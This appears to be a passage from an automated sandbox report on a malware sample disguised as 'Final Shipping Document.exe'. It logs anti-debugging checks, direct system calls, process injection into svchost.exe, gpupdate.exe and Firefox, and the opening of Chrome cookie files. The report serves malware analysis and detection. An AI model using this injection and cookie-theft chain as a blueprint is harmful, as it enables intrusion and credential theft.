            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h] 2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h] 2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h] 2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h] 2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h] 2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h] 2_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h] 2_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h] 2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h] 2_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h] 2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h] 2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h] 2_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h] 2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h] 2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h] 2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h] 2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h] 2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404940 mov eax, dword ptr fs:[00000030h] 2_2_03404940
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h] 2_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h] 2_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h] 2_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h] 2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h] 2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h] 2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h] 2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h] 2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h] 2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h] 2_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h] 2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h] 2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h] 2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h] 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h] 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h] 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h] 2_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h] 2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h] 2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h] 2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h] 2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h] 2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h] 2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h] 2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h] 2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h] 2_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h] 2_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h] 2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h] 2_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h] 2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h] 2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h] 2_2_033BC810
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C00B62
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BD2622
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BC083F
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BC09D5 SetUnhandledExceptionFilter, 0_2_00BC09D5
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BC0C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\gpupdate.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\gpupdate.exe Section loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: read write
            Source: C:\Windows\SysWOW64\gpupdate.exe Section loaded: NULL target: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\gpupdate.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\gpupdate.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\gpupdate.exe Thread register set: target process: 6692
            Source: C:\Windows\SysWOW64\gpupdate.exe Thread APC queued: target process: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 295C008
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C01201
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BE2BA5
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C0B226 SendInput,keybd_event, 0_2_00C0B226
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00C222DA
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Final Shipping Document.exe"
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\SysWOW64\gpupdate.exe"
            Source: C:\Windows\SysWOW64\gpupdate.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C00B62
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C01663
            Source: Final Shipping Document.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: Final Shipping Document.exe, QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: QnAcfZuONg.exe, 00000004.00000002.3889477339.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000004.00000000.2292932592.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3889973677.0000000001781000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BC0698 cpuid 0_2_00BC0698
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00C18195
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BFD27A GetUserNameW, 0_2_00BFD27A
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BDB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00BDB952
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BA42DE

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
